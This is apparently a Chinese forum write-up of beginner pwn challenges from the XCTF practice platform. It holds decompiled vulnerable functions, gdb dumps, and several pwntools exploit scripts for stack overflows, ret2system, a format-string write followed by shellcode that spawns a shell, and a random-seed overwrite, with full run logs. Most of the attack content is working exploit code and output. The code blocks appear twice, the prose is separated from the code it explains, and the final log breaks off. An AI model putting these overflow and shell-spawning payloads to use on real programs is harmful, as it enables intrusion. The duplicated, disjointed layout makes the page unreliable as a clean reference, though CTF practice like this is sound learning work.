最近在看《CTF权威指南-pwn篇》,有时候一个题目觉得看懂了exp和知识点,实际上感受不深可能过几天全忘了。所以我选择做真题加深知识的理解。这里,使用攻防世界的所有pwn新手题来温习一些基本的利用方式。
p.s. 攻防世界创建在线场景一直失败,真是醉了
主要逻辑如下:
典型的ret2win,变量位于.bss段:
直接溢出获取flag:
因为是使用小端序比较数据,所以需要反转下字符串。第一题简单是预想之内的情况,不知道接下来是什么难度。
简单栈溢出,主要流程如下:
这里直接ret2到具体调用system的地方:
脚本:
题目提示rop,然而我直接ret2libc:
脚本如下:
看了下其他人写的wp,似乎rop提示对应的是x64版本的程序,因为x64环境下的传参方式从栈传递变成了寄存器rdi,rsi,rcx,rdx,r8,r9传参,所以调用system时需要特殊gadget(pop rdi)将字符串/bin/sh赋给rdi的形式构造参数。
程序流程比较长,这里笔者长话短说简单阐述下程序情况;首先有个alarm会结束程序运行,使用sed -i s/alarm/isnan/g ./1d3c852354df4609bf8e56fe8e9df316将其直接替换掉1。
安全机制如下:
嗯保护很全,程序最后mmap了一段内存让我们输入然后跳过去执行:
需要使用它的格式化字符串漏洞将堆上的首个数据设置成0x55:
在调试中调用printf时栈情况如下:
栈中第二个参数为之前输入的地址数据,那么在x64环境中使用"%7$n"去定位Heap[0],py如下:
这题很简单:
程序从/dev/urandom2中取出随机数作为种子,生成十个随机数让我们猜测,猜对十个随机数即可获胜。这里有一个知识点是当seed固定时,之后生成的随机数都是一样的:
可以观察下面的输出:
从而我们可以利用程序的缓冲区溢出覆盖掉seed的值:
脚本如下:
效果:
题目关键点如下:
有个巨大问题是居然使用al赋给变量值:
所以这可以利用整数溢出的方式,构造261个长度的密码并调试到这一行指令:
构造py:
效果:
程序关键点如下:
gets存在栈溢出危险,我们直接ret到pwn函数中的call system,借用name作为参数'/bin/sh',编写py:
额和名字一样运行就拿shell了:
这题目《ctf竞赛权威指南》上有很相似的例子(page 80),总之就是泄露libc的地址,然后再调用system:
这里参考了大佬的博文更换程序libc3,但运行时还是会报错,索性直接把libc换了然后动态加载器执行:
然后用我的exp就成功执行了,反正可以模拟远程连接的环境也就行了:
一个典型的字符串格式化漏洞,需要我们修改某个变量的值:
gdb调试:
在第十个位置上存放我们的字符串,据此编写exp:
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
alarm(0x3Cu);
setbuf(stdout, 0LL);
puts("~~ welcome to ctf ~~ ");
puts("lets get helloworld for bof");
read(0, &Buf_601068, 0x10uLL);
if ( target_60106C == 'nuaa' )
sub_400686();
return 0LL;
}
__int64 sub_400686()
{
system("cat flag.txt");
return 0LL;
}
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
alarm(0x3Cu);
setbuf(stdout, 0LL);
puts("~~ welcome to ctf ~~ ");
puts("lets get helloworld for bof");
read(0, &Buf_601068, 0x10uLL);
if ( target_60106C == 'nuaa' )
sub_400686();
return 0LL;
}
__int64 sub_400686()
{
system("cat flag.txt");
return 0LL;
}
0000601068 ?? Buf_601068 db ? ; ; DATA XREF: main+3B↑o
.bss:0000000000601069 ?? db ? ;
.bss:000000000060106A ?? db ? ;
.bss:000000000060106B ?? db ? ;
.bss:000000000060106C ?? ?? ?? ?? target_60106C dd ? ; DATA XREF: main+4A↑r
0000601068 ?? Buf_601068 db ? ; ; DATA XREF: main+3B↑o
.bss:0000000000601069 ?? db ? ;
.bss:000000000060106A ?? db ? ;
.bss:000000000060106B ?? db ? ;
.bss:000000000060106C ?? ?? ?? ?? target_60106C dd ? ; DATA XREF: main+4A↑r
dc@ubuntu:~/playground/xctf_word/pwn$ echo '12345' > flag.txt
dc@ubuntu:~/playground/xctf_word/pwn$ ./4f2f44c9471d4dc2b59768779e378282
~~ welcome to ctf ~~
lets get helloworld for bof
1111nuaa
dc@ubuntu:~/playground/xctf_word/pwn$ ./4f2f44c9471d4dc2b59768779e378282
~~ welcome to ctf ~~
lets get helloworld for bof
1111aaun
12345
dc@ubuntu:~/playground/xctf_word/pwn$ echo '12345' > flag.txt
dc@ubuntu:~/playground/xctf_word/pwn$ ./4f2f44c9471d4dc2b59768779e378282
~~ welcome to ctf ~~
lets get helloworld for bof
1111nuaa
dc@ubuntu:~/playground/xctf_word/pwn$ ./4f2f44c9471d4dc2b59768779e378282
~~ welcome to ctf ~~
lets get helloworld for bof
1111aaun
12345
ssize_t vulnerable_function()
{
char buf; // [rsp+0h] [rbp-80h]
return read(0, &buf, 0x200uLL);
}
int callsystem()
{
return system("/bin/sh");
}
ssize_t vulnerable_function()
{
char buf; // [rsp+0h] [rbp-80h]
return read(0, &buf, 0x200uLL);
}
int callsystem()
{
return system("/bin/sh");
}
text:0000000000400596 55 push rbp
.text:0000000000400597 48 89 E5 mov rbp, rsp
.text:000000000040059A BF 84 06 40 00 mov edi, offset command ; "/bin/sh" <------
.text:000000000040059F E8 BC FE FF FF call _system
.text:00000000004005A4 5D pop rbp
.text:00000000004005A5 C3 retn
text:0000000000400596 55 push rbp
.text:0000000000400597 48 89 E5 mov rbp, rsp
.text:000000000040059A BF 84 06 40 00 mov edi, offset command ; "/bin/sh" <------
.text:000000000040059F E8 BC FE FF FF call _system
.text:00000000004005A4 5D pop rbp
.text:00000000004005A5 C3 retn
from pwn import *
context.log_level = "DEBUG"
io = process('291721f42a044f50a2aead748d539df0')
win_function = 0x40059A
payload = 'A'*0x88+p64(win_function)
io.recv()
pwnlib.gdb.attach(io,gdbscript=
)
pause()
io.send(payload)
io.interactive()
from pwn import *
context.log_level = "DEBUG"
io = process('291721f42a044f50a2aead748d539df0')
win_function = 0x40059A
payload = 'A'*0x88+p64(win_function)
io.recv()
pwnlib.gdb.attach(io,gdbscript=
)
pause()
io.send(payload)
io.interactive()
dc@ubuntu:~/playground/xctf_word/pwn$ pwn checksec 1ab77c073b4f4524b73e086d063f884e
[*] '/home/dc/playground/xctf_word/pwn/1ab77c073b4f4524b73e086d063f884e'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
dc@ubuntu:~/playground/xctf_word/pwn$
ssize_t vulnerable_function()
{
char buf; // [esp+0h] [ebp-88h]
system("echo Input:");
return read(0, &buf, 0x100u);
}
dc@ubuntu:~/playground/xctf_word/pwn$ pwn checksec 1ab77c073b4f4524b73e086d063f884e
[*] '/home/dc/playground/xctf_word/pwn/1ab77c073b4f4524b73e086d063f884e'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
dc@ubuntu:~/playground/xctf_word/pwn$
ssize_t vulnerable_function()
{
char buf; // [esp+0h] [ebp-88h]
system("echo Input:");
return read(0, &buf, 0x100u);
}
from pwn import *
context.log_level = "DEBUG"
io = process('./1ab77c073b4f4524b73e086d063f884e')
elf = ELF('./1ab77c073b4f4524b73e086d063f884e')
hit_binsh = 0x804A024
payload = 'A'*0x8C+p32(elf.sym['system'])+'A'*4+p32(hit_binsh)
io.recv()
pwnlib.gdb.attach(io,gdbscript=
)
pause()
io.send(payload)
io.interactive()
from pwn import *
context.log_level = "DEBUG"
io = process('./1ab77c073b4f4524b73e086d063f884e')
elf = ELF('./1ab77c073b4f4524b73e086d063f884e')
hit_binsh = 0x804A024
payload = 'A'*0x8C+p32(elf.sym['system'])+'A'*4+p32(hit_binsh)
io.recv()
pwnlib.gdb.attach(io,gdbscript=
)
pause()
io.send(payload)
io.interactive()
dc@ubuntu:~/playground/xctf_word/pwn$ pwn checksec 1d3c852354df4609bf8e56fe8e9df316
[*] '/home/dc/playground/xctf_word/pwn/1d3c852354df4609bf8e56fe8e9df316'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
dc@ubuntu:~/playground/xctf_word/pwn$ pwn checksec 1d3c852354df4609bf8e56fe8e9df316
[*] '/home/dc/playground/xctf_word/pwn/1d3c852354df4609bf8e56fe8e9df316'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
if ( *HEAP_1_D_2_U == HEAP_1_D_2_U[1] )
{
puts("Wizard: I will help you! USE YOU SPELL");
v1 = mmap(0LL, 0x1000uLL, 7, 33, -1, 0LL);
read(0, v1, 0x100uLL);
(v1)(0LL, v1);
}
if ( *HEAP_1_D_2_U == HEAP_1_D_2_U[1] )
{
puts("Wizard: I will help you! USE YOU SPELL");
v1 = mmap(0LL, 0x1000uLL, 7, 33, -1, 0LL);
read(0, v1, 0x100uLL);
(v1)(0LL, v1);
}
_isoc99_scanf("%ld", &v2);
puts("And, you wish is:");
_isoc99_scanf("%s", &format);
puts("Your wish is");
printf(&format, &format);
_isoc99_scanf("%ld", &v2);
puts("And, you wish is:");
_isoc99_scanf("%s", &format);
puts("Your wish is");
printf(&format, &format);
0x00007fffffffdb28│+0x0000: 0x0000000000400c83 → mov edi, 0x401c23 ← $rsp
0x00007fffffffdb30│+0x0008: 0x00000001f7dca2a0
0x00007fffffffdb38│+0x0010: 0x0000000000604260 → 0x0000005500000044 ("D"?)
0x00007fffffffdb40│+0x0018: 0x0000000078243125 ("%1$x"?) ← $rdi
0x00007fffffffdb48│+0x0020: 0x00007ffff7a6f4d3 → <_IO_file_overflow+259> cmp eax, 0xffffffff
0x00007fffffffdb50│+0x0028: 0x0000000000000022 ("""?)
0x00007fffffffdb58│+0x0030: 0x00007ffff7dce760 → 0x00000000fbad2887
0x00007fffffffdb60│+0x0038: 0x0000000000401a68 → "So, where you will go?east or up?:"
0x00007fffffffdb28│+0x0000: 0x0000000000400c83 → mov edi, 0x401c23 ← $rsp
0x00007fffffffdb30│+0x0008: 0x00000001f7dca2a0
0x00007fffffffdb38│+0x0010: 0x0000000000604260 → 0x0000005500000044 ("D"?)
0x00007fffffffdb40│+0x0018: 0x0000000078243125 ("%1$x"?) ← $rdi
0x00007fffffffdb48│+0x0020: 0x00007ffff7a6f4d3 → <_IO_file_overflow+259> cmp eax, 0xffffffff
0x00007fffffffdb50│+0x0028: 0x0000000000000022 ("""?)
0x00007fffffffdb58│+0x0030: 0x00007ffff7dce760 → 0x00000000fbad2887
0x00007fffffffdb60│+0x0038: 0x0000000000401a68 → "So, where you will go?east or up?:"
from pwn import *
context.arch="amd64"
context.log_level = "DEBUG"
io = process('./1d3c852354df4609bf8e56fe8e9df316')
io.recvuntil('secret[0] is ')
secret1 = int(io.recvuntil('\n'),16)
io.recvuntil('secret[1] is ')
secret2 = int(io.recvuntil('\n'),16)
log.info("%s %s" % (secret1,secret2))
io.recv()
io.sendline('noname')
io.recv()
io.sendline('east')
io.recv()
io.sendline('1')
io.recv()
io.sendline(str(secret1))
io.recv()
io.sendline('%085d%7$n')
io.recv()
io.send(asm(shellcraft.sh()))
io.interactive()
from pwn import *
context.arch="amd64"
context.log_level = "DEBUG"
io = process('./1d3c852354df4609bf8e56fe8e9df316')
io.recvuntil('secret[0] is ')
secret1 = int(io.recvuntil('\n'),16)
io.recvuntil('secret[1] is ')
secret2 = int(io.recvuntil('\n'),16)
log.info("%s %s" % (secret1,secret2))
io.recv()
io.sendline('noname')
io.recv()
io.sendline('east')
io.recv()
io.sendline('1')
io.recv()
io.sendline(str(secret1))
io.recv()
io.sendline('%085d%7$n')
io.recv()
io.send(asm(shellcraft.sh()))
io.interactive()
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
int input_num; // [rsp+4h] [rbp-3Ch]
int index; // [rsp+8h] [rbp-38h]
int rand_num; // [rsp+Ch] [rbp-34h]
char name; // [rsp+10h] [rbp-30h]
unsigned int seed[2]; // [rsp+30h] [rbp-10h]
unsigned __int64 v9; // [rsp+38h] [rbp-8h]
v9 = __readfsqword(0x28u);
setbuf(stdin, 0LL);
setbuf(stdout, 0LL);
setbuf(stderr, 0LL);
input_num = 0;
rand_num = 0;
*seed = sub_BB0();
puts("-------------------------------");
puts("Welcome to a guess number game!");
puts("-------------------------------");
puts("Please let me know your name!");
printf("Your name:", 0LL);
gets(&name);
srand(seed[0]);
for ( index = 0; index <= 9; ++index )
{
rand_num = rand() % 6 + 1;
printf("-------------Turn:%d-------------\n", (index + 1));
printf("Please input your guess number:");
__isoc99_scanf("%d", &input_num);
puts("---------------------------------");
if ( input_num != rand_num )
{
puts("GG!");
exit(1);
}
puts("Success!");
}
win_C3E();
return 0LL;
}
__int64 sub_BB0()
{
int fd; // [rsp+Ch] [rbp-14h]
__int64 buf; // [rsp+10h] [rbp-10h]
unsigned __int64 v3; // [rsp+18h] [rbp-8h]
v3 = __readfsqword(0x28u);
fd = open("/dev/urandom", 0);
if ( fd < 0 || read(fd, &buf, 8uLL) < 0 )
exit(1);
if ( fd > 0 )
close(fd);
return buf;
}
__int64 sub_C3E()
{
printf("You are a prophet!\nHere is your flag!");
system("cat flag");
return 0LL;
}
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
int input_num; // [rsp+4h] [rbp-3Ch]
int index; // [rsp+8h] [rbp-38h]
int rand_num; // [rsp+Ch] [rbp-34h]
char name; // [rsp+10h] [rbp-30h]
unsigned int seed[2]; // [rsp+30h] [rbp-10h]
unsigned __int64 v9; // [rsp+38h] [rbp-8h]
v9 = __readfsqword(0x28u);
setbuf(stdin, 0LL);
setbuf(stdout, 0LL);
setbuf(stderr, 0LL);
input_num = 0;
rand_num = 0;
*seed = sub_BB0();
puts("-------------------------------");
puts("Welcome to a guess number game!");
puts("-------------------------------");
puts("Please let me know your name!");
printf("Your name:", 0LL);
gets(&name);
srand(seed[0]);
for ( index = 0; index <= 9; ++index )
{
rand_num = rand() % 6 + 1;
printf("-------------Turn:%d-------------\n", (index + 1));
printf("Please input your guess number:");
__isoc99_scanf("%d", &input_num);
puts("---------------------------------");
if ( input_num != rand_num )
{
puts("GG!");
exit(1);
}
puts("Success!");
}
win_C3E();
return 0LL;
}
__int64 sub_BB0()
{
int fd; // [rsp+Ch] [rbp-14h]
__int64 buf; // [rsp+10h] [rbp-10h]
unsigned __int64 v3; // [rsp+18h] [rbp-8h]
v3 = __readfsqword(0x28u);
fd = open("/dev/urandom", 0);
if ( fd < 0 || read(fd, &buf, 8uLL) < 0 )
exit(1);
if ( fd > 0 )
close(fd);
return buf;
}
__int64 sub_C3E()
{
printf("You are a prophet!\nHere is your flag!");
system("cat flag");
return 0LL;
}
dc@ubuntu:~/playground/xctf_word/pwn$ cat ten_rand_nums_.c
int main(void)
{
srand(0);
for (int index = 0 ; index != 10 ; index++)
printf("%d ",(rand()%6+1));
return 0;
}
dc@ubuntu:~/playground/xctf_word/pwn$ cat ten_rand_nums_.c
int main(void)
{
srand(0);
for (int index = 0 ; index != 10 ; index++)
printf("%d ",(rand()%6+1));
return 0;
}
dc@ubuntu:~/playground/xctf_word/pwn$ gcc ten_rand_nums_.c -o ten_rand_nums
dc@ubuntu:~/playground/xctf_word/pwn$ ./ten_rand_nums
2 5 4 2 6 2 5 1 4 2 dc@ubuntu:~/playground/xctf_word/pwn$ ./ten_rand_nums
2 5 4 2 6 2 5 1 4 2 dc@ubuntu:~/playground/xctf_word/pwn$
dc@ubuntu:~/playground/xctf_word/pwn$ gcc ten_rand_nums_.c -o ten_rand_nums
dc@ubuntu:~/playground/xctf_word/pwn$ ./ten_rand_nums
2 5 4 2 6 2 5 1 4 2 dc@ubuntu:~/playground/xctf_word/pwn$ ./ten_rand_nums
2 5 4 2 6 2 5 1 4 2 dc@ubuntu:~/playground/xctf_word/pwn$
-0000000000000030 name db ?
-000000000000002F db ? ; undefined
-000000000000002E db ? ; undefined
-000000000000002D db ? ; undefined
-000000000000002C db ? ; undefined
-000000000000002B db ? ; undefined
-000000000000002A db ? ; undefined
-0000000000000029 db ? ; undefined
-0000000000000028 db ? ; undefined
-0000000000000027 db ? ; undefined
-0000000000000026 db ? ; undefined
-0000000000000025 db ? ; undefined
-0000000000000024 db ? ; undefined
-0000000000000023 db ? ; undefined
-0000000000000022 db ? ; undefined
-0000000000000021 db ? ; undefined
-0000000000000020 db ? ; undefined
-000000000000001F db ? ; undefined
-000000000000001E db ? ; undefined
-000000000000001D db ? ; undefined
-000000000000001C db ? ; undefined
-000000000000001B db ? ; undefined
-000000000000001A db ? ; undefined
-0000000000000019 db ? ; undefined
-0000000000000018 db ? ; undefined
-0000000000000017 db ? ; undefined
-0000000000000016 db ? ; undefined
-0000000000000015 db ? ; undefined
-0000000000000014 db ? ; undefined
-0000000000000013 db ? ; undefined
-0000000000000012 db ? ; undefined
-0000000000000011 db ? ; undefined
-0000000000000010 seed dd 2 dup(?)
-0000000000000030 name db ?
-000000000000002F db ? ; undefined
-000000000000002E db ? ; undefined
-000000000000002D db ? ; undefined
-000000000000002C db ? ; undefined
-000000000000002B db ? ; undefined
-000000000000002A db ? ; undefined
-0000000000000029 db ? ; undefined
-0000000000000028 db ? ; undefined
-0000000000000027 db ? ; undefined
-0000000000000026 db ? ; undefined
-0000000000000025 db ? ; undefined
-0000000000000024 db ? ; undefined
-0000000000000023 db ? ; undefined
-0000000000000022 db ? ; undefined
-0000000000000021 db ? ; undefined
-0000000000000020 db ? ; undefined
-000000000000001F db ? ; undefined
-000000000000001E db ? ; undefined
-000000000000001D db ? ; undefined
-000000000000001C db ? ; undefined
-000000000000001B db ? ; undefined
-000000000000001A db ? ; undefined
-0000000000000019 db ? ; undefined
-0000000000000018 db ? ; undefined
-0000000000000017 db ? ; undefined
-0000000000000016 db ? ; undefined
-0000000000000015 db ? ; undefined
-0000000000000014 db ? ; undefined
-0000000000000013 db ? ; undefined
-0000000000000012 db ? ; undefined
-0000000000000011 db ? ; undefined
-0000000000000010 seed dd 2 dup(?)
from pwn import *
context.log_level = "DEBUG"
nums = [2,5,4,2,6,2,5,1,4,2]
io = process('./b59204f56a0545e8a22f8518e749f19f')
io.recv()
io.sendline('A'*0x20+'\x00'*4)
for num in nums:
io.recv()
io.sendline(str(num))
io.recv()
from pwn import *
context.log_level = "DEBUG"
nums = [2,5,4,2,6,2,5,1,4,2]
io = process('./b59204f56a0545e8a22f8518e749f19f')
io.recv()
io.sendline('A'*0x20+'\x00'*4)
for num in nums:
io.recv()
io.sendline(str(num))
io.recv()
dc@ubuntu:~/playground/xctf_word/pwn$ python payload_b59204f56a0545e8a22f8518e749f19f.py
[+] Starting local process './b59204f56a0545e8a22f8518e749f19f' argv=['./b59204f56a0545e8a22f8518e749f19f'] : pid 5635
[DEBUG] Received 0x88 bytes:
'-------------------------------\n'
'Welcome to a guess number game!\n'
'-------------------------------\n'
'Please let me know your name!\n'
'Your name:'
[DEBUG] Sent 0x25 bytes:
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
*
00000020 00 00 00 00 0a │····│·│
00000025
[DEBUG] Received 0x40 bytes:
'-------------Turn:1-------------\n'
'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
'2\n'
[DEBUG] Received 0x6b bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:2-------------\n'
'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
'5\n'
[DEBUG] Received 0x6b bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:3-------------\n'
'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
'4\n'
[DEBUG] Received 0x6b bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:4-------------\n'
'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
'2\n'
[DEBUG] Received 0x6b bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:5-------------\n'
'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
'6\n'
[DEBUG] Received 0x6b bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:6-------------\n'
'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
'2\n'
[DEBUG] Received 0x6b bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:7-------------\n'
'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
'5\n'
[DEBUG] Received 0x6b bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:8-------------\n'
'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
'1\n'
[DEBUG] Received 0x6b bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:9-------------\n'
'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
'4\n'
[DEBUG] Received 0x6c bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:10-------------\n'
'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
'2\n'
[*] Process './b59204f56a0545e8a22f8518e749f19f' stopped with exit code 0 (pid 5635)
[DEBUG] Received 0x5a bytes:
'---------------------------------\n'
'Success!\n'
'You are a prophet!\n'
'Here is your flag!fake_flag\n'
dc@ubuntu:~/playground/xctf_word/pwn$ python payload_b59204f56a0545e8a22f8518e749f19f.py
[+] Starting local process './b59204f56a0545e8a22f8518e749f19f' argv=['./b59204f56a0545e8a22f8518e749f19f'] : pid 5635
[DEBUG] Received 0x88 bytes:
'-------------------------------\n'
'Welcome to a guess number game!\n'
'-------------------------------\n'
'Please let me know your name!\n'
'Your name:'
[DEBUG] Sent 0x25 bytes:
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
*
00000020 00 00 00 00 0a │····│·│
00000025
[DEBUG] Received 0x40 bytes:
'-------------Turn:1-------------\n'
'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
'2\n'
[DEBUG] Received 0x6b bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:2-------------\n'
'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
'5\n'
[DEBUG] Received 0x6b bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:3-------------\n'
'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
'4\n'
[DEBUG] Received 0x6b bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:4-------------\n'
'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
'2\n'
[DEBUG] Received 0x6b bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:5-------------\n'
'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
'6\n'
[DEBUG] Received 0x6b bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:6-------------\n'
'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
'2\n'
[DEBUG] Received 0x6b bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:7-------------\n'
'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
'5\n'
[DEBUG] Received 0x6b bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:8-------------\n'
'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
'1\n'
[DEBUG] Received 0x6b bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:9-------------\n'
'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
'4\n'
[DEBUG] Received 0x6c bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:10-------------\n'
'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
'2\n'
[*] Process './b59204f56a0545e8a22f8518e749f19f' stopped with exit code 0 (pid 5635)
[DEBUG] Received 0x5a bytes:
'---------------------------------\n'
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
最后于 2021-5-14 00:45
被顾言庭编辑
,原因:
